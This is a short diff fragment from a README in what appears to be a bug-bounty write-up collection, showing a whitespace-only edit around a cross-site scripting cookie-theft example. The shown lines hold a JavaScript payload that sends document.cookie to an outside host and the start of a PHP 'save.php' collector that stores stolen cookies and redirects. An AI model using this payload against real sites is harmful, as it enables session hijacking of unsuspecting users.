g3nj1z/Awesome-Bugbounty-Writeups/README.md

     document.location='https://ł.rip/save.php?c='+document.cookie;

-3. source code of save.php file is given below which would save the cookie into a text file
+3.source code of save.php file is given below which would save the cookie into a text file

 >     <?php
 >     header('Location:https://yourdomain.com');